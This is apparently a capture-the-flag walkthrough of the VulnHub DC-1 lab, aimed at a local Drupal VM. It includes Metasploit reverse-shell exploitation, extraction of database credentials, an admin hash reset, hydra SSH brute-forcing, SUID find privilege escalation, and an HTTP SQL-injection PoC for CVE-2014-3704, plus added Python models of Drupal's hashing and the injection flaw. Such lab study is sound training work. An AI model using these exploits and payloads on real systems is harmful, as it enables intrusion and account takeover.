Foreword
This is the third target machine, and I feel it is more interesting this time. It has 5 flags, which is closer to the provincial competition format. This time, let's go through it in the order of the flags. In fact, you can escalate privileges and get the flag in one step.
Preparation
Knowledge points
- Drupal CMS remote code execution vulnerability (CVE-2018-7600)
- Drupal CMS SQL injection vulnerability getshell (CVE-2014-3704)
- View the website configuration file to obtain the database login password
- Change the password hash in the database to reset the admin user's password
- Brute-force the flag4 user's password with hydra
- SUID privilege escalation via find
Reference article
csdn: VulnHub target machine penetration – DC-1 (drupal)
Zhihu: Entry-level target machine: Penetration testing of DC-1
drupal7 official website: drupal7 password reset
FreeBuf: A brief talk about SUID privilege escalation
csdn: SQL injection in the DC-1 login box (not the focus of this article; I tried many times and only succeeded once)
Tools
Make it a habit to write down the tools and the target machine's addresses in the blog post (so they are not forgotten).
Kali basically has everything needed.
VulnHub target machine download
Official website address: https://www.vulnhub.com/entry/dc-1,292/
Start
Information collection
Detect the IP address of the target machine on the internal network
arp-scan -l
netdiscover -r 192.168.30.0/24
Target machine IP obtained: 192.168.30.130
Detect the target machine's open ports
nmap -sS -T4 -v -O 192.168.30.130
Port 80 is open, so visit it in a browser.
I struggled for a long time (password brute-forcing, SQL injection, trying every function)…
Identify the website CMS from Kali
whatweb -v 192.168.30.130
The Wappalyzer browser plugin also identifies the website CMS.
Another long round of tossing…
Search for vulnerabilities in this CMS version in your browser; don't skip this step. Once you search, oh my god, this CMS is really full of vulnerabilities.
I went back and forth over which vulnerability could be used; in the end only two were usable. The others were either unusable or required the administrator password for the remote RCE, and I couldn't figure out the administrator's password. The website also had defensive measures, which I had to accept: after a few attempts my IP was blocked and I had to restore a snapshot (fortunately, I had taken one).
The following two are usable:
- Drupal CMS remote code execution vulnerability (CVE-2018-7600)
- Drupal CMS SQL injection vulnerability getshell (CVE-2014-3704) (I don't know if it is because of my sqlmap, but I haven't been able to detect it. I tried several times and accidentally succeeded once, but then never again.)
MSF – Drupal CMS remote code execution vulnerability
Go directly to msf
msfdb run
search Drupal
Both of the following modules work against the target machine: mainly the RCE, then the SQL injection.
In one go, set the payload and the target IP and get a shell
use 1
set payload php/meterpreter/reverse_tcp
set rhosts 192.168.30.130
exploit
Drop into the shell, then use Python to spawn an interactive shell
shell
python -c 'import pty; pty.spawn("/bin/bash")'
Look at the directory; there is a very conspicuous flag1.txt. Read it.
ls
cat flag1.txt
Every good CMS needs a config file - and so do you.
This means we are looking for the CMS configuration file.
Searching for this CMS's important configuration files… why does no one post the configuration file path (I searched for a long time…)
ls sites/default
default.settings.php  files  settings.php
According to the hint it should be the settings.php file; check it.
cat sites/default/settings.php
Get the database password
flag2 appeared
There is a database connection configuration, so the database should be reachable. Since the website has a login page, I went straight for the admin user's password.
$databases = array (
  'default' => array (
    'default' => array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
The first time, I couldn’t log in because I entered the wrong password. I thought it was a permissions issue, so I struggled here for a long time…
Connect to the database…
mysql -udbuser -pR0ck3t
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupaldb           |
+--------------------+
use drupaldb;
show tables;   # go straight for the users table
+-----------------------------+
| Tables_in_drupaldb          |
+-----------------------------+
| actions                     |
| authmap                     |
| batch                       |
| block                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| ....                        |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
+-----------------------------+
The password seems to be stored with some kind of hashing algorithm.
Supplement: Drupal originally stored passwords as plain MD5 hashes, but since 7.0 it has used a salted, iterated hash format for security reasons. That is the custom hashing scheme used here.
select * from users \G
*************************** 2. row ***************************
uid: 1
name: admin
pass: $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
mail: [email protected]
theme:
signature:
signature_format: NULL
created: 1550581826
access: 1550583852
login: 1550582362
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: [email protected]
data: b:0;
Reset the admin user password in mysql
Search online for "drupal7 password reset": https://drupalchina.cn/node/1964
There is a custom password-hashing PHP script in the scripts directory under the website root.
First temporarily exit mysql and generate a hash with this script, then reset the admin administrator's password.
php ./scripts/password-hash.sh 123456
hash: $S$DrlQBqDTMqPeUjwcC9Dwm7cRJ0ZUveSpKuGEMo7mfx9h6c/yHBgp
Replace the password part of admin with the above hash value and update the users table.
update users set pass='$S$DrlQBqDTMqPeUjwcC9Dwm7cRJ0ZUveSpKuGEMo7mfx9h6c/yHBgp' where uid=1;
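To make the `$S$` format above concrete, here is a Python model of Drupal 7's password hashing (includes/password.inc), added as an example and not code from this write-up or from Drupal itself: the character after `$S$` encodes the number of SHA-512 rounds, the next eight characters are the salt, and login recomputes the hash with that salt and cost before comparing. Checking the hash that password-hash.sh printed for 123456 confirms it is well formed before the `update users` is run, and `iterations` shows why a leaked hash still costs 32768 rounds per guess.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55              # DRUPAL_HASH_LENGTH: the stored value is truncated to 55 chars
MIN_LOG2, MAX_LOG2 = 7, 30    # DRUPAL_MIN_HASH_COUNT / DRUPAL_MAX_HASH_COUNT

def _b64_encode(data: bytes) -> str:
    """phpass-style base64: custom alphabet, 6 bits per character, no padding."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def iterations(stored_hash: str) -> int:
    """The work factor travels with the hash: '$S$D...' means 2**15 = 32768 SHA-512 rounds."""
    return 1 << ITOA64.index(stored_hash[3])

def drupal7_hash(password: str, setting: str):
    """Recompute the $S$ hash of password from the cost character and 8-char salt in setting."""
    setting = setting[:12]                       # "$S$" + cost char + salt
    count_log2 = ITOA64.find(setting[3]) if setting.startswith("$S$") and len(setting) == 12 else -1
    if len(password) > 512 or not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        return None
    pw, salt = password.encode(), setting[4:12].encode()
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << count_log2):             # the password is re-mixed into every round
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _b64_encode(digest))[:HASH_LENGTH]

def drupal7_check(password: str, stored_hash: str) -> bool:
    """Mirror of user_check_password() for $S$ hashes: recompute with the stored salt/cost."""
    computed = drupal7_hash(password, stored_hash)
    return computed is not None and hmac.compare_digest(computed, stored_hash)
```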
After changing it, log in to the website.
After logging in and poking around, flag3 was found.
flag3 hint (translated): Special PERMS will help find passwords, but you need to execute the command to find what's in shadow.
That said, there is nothing else to do in the website's admin backend (getting a shell did not require any backend operations).
According to the flag3 prompt, you should check the /etc/passwd file.
cat /etc/passwd
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
There is a flag4 user, whose password can actually be brute-forced (the hydra run is shown in a later section).
Look at the /home/flag4 directory (at first I thought the www-data user could not access it, but who knew this directory was readable by other users? Sometimes the details really do determine success or failure).
ls /home/flag4
flag4.txt
# view the flag4 file
cat /home/flag4/flag4.txt
Can you use this same method to find or access the flag in root? Probably. But perhaps it's not that easy. Or maybe it is?
It is already obvious that we are meant to access the flag file under root, though I went in a big circle to get here. Right after getting a shell you could escalate privileges and read it directly, but if you want to collect all the flags you still have to follow this route.
Privilege escalation – access the final flag
Look for SUID binaries that can be used to escalate privileges
find / -perm -u=s -type f 2>/dev/null
I found that the find command has the SUID bit set and can be used to escalate privileges. You can refer to this article on SUID privilege escalation: https://www.freebuf.com/articles/web/272617.html
find / -exec "/bin/bash" -p \;
Successfully escalated privileges
bash-4.2# whoami
root
View the final flag file
cat /root/thefinalflag.txt
Extra knowledge – brute-forcing the flag4 user's password with hydra
Now participating in the 23rd Xiangshan Net Shield competition…
View the wordlist files that come with Kali
wordlists
A large dictionary, rockyou.txt, and a small one, john.lst. In real situations you may need to prepare a specific dictionary for brute-forcing; this is just a demonstration of the process.
Start brute-forcing
hydra -l flag4 -P /usr/share/wordlists/john.lst 192.168.30.130 ssh -f
Successfully brute-forced user flag4; the password is: orange
Use ssh to log in remotely
ssh [email protected]
Additional knowledge – SQL injection vulnerability getshell (CVE-2014-3704)
The 2023 Xiangshan Net Shield has ended, score: 100 points, ranking 25/56, hard-won results. The first time I participated in the offensive and defensive drill was the red team. It has taken a big step to achieve results. I will participate in more projects of this type in the future. In addition, the food in the mobile building is really good.
I don't understand this SQL injection very well. It works when tested manually, but it cannot be run with sqlmap: what comes back is a 502 error. Is it because of the 502?
Manual testing showed SQL injection in the array subscript of the name[*] field. This was the first time I had seen this kind of injection point, and it is a hole from way back in 2014.
PoC
POST /?q=node&destination=node HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)#]=bob&name[0]=a
Send the request with Burp and view the result. The current connection user name is displayed in red, and the error-based injection succeeded.
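To show why the text of a name[...] array key ends up inside the SQL, here is a Python model of Drupal 7's DatabaseConnection::expandArguments() before and after the 7.32 fix (SA-CORE-2014-005). This is an added example, not Drupal's own PHP; the query text and the `:name` placeholder are assumed for illustration, and the input is the form array the PoC body above turns into after PHP parses it.

```python
import re

# Constructed input: the PHP array that the PoC body above
# "name[0 or updatexml(0,concat(0xa,user()),0)#]=bob&name[0]=a" becomes after PHP parses it.
POC_NAME = {"0 or updatexml(0,concat(0xa,user()),0)#": "bob", 0: "a"}
# Assumed query and placeholder name for illustration; Drupal generates its own placeholders.
QUERY = "SELECT * FROM users WHERE name IN (:name) AND status = 1"


def expand_arguments(query: str, args: dict, fixed: bool):
    """Model of DatabaseConnection::expandArguments(): a placeholder bound to an array is
    replaced by a comma-separated list of one placeholder per element. Before the 7.32 fix
    the new placeholder names were built from the array KEYS, which come straight from the
    request, so a crafted key is spliced into the SQL text without ever being a bound value."""
    args = dict(args)
    for key, data in list(args.items()):
        if not isinstance(data, dict):
            continue
        items = enumerate(data.values()) if fixed else data.items()   # fix == array_values()
        new_keys = {f"{key}_{i}": value for i, value in items}
        query = re.sub(re.escape(key) + r"\b", lambda _m: ", ".join(new_keys), query)
        del args[key]
        args.update(new_keys)
    return query, args


def vulnerable_query():
    """Drupal 7.31 behaviour: the key text lands in the SQL and '#' comments out the rest."""
    return expand_arguments(QUERY, {":name": POC_NAME}, fixed=False)


def fixed_query():
    """Drupal 7.32 behaviour: placeholders are numbered, user data stays a bound parameter."""
    return expand_arguments(QUERY, {":name": POC_NAME}, fixed=True)
```

The fix is only one `array_values()` call, which is why upgrading (or applying that single-line patch) closed the hole without any change to the login form.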
A slap in the face…
This time I used sqlmap and it actually worked. I couldn’t get it to work before…
sqlmap -r sql.txt --batch --dbs
Use msf to search for drupal and select the third module
msf6 > search drupal
msf6 > use 2
Set the remote target address
set rhosts 192.168.30.130
exploit
The reverse shell comes back successfully, and the subsequent steps to obtain the flags are the same as before.
Summary
No summary…
It's been so long that I can't remember my thoughts at the time; I'll add more later.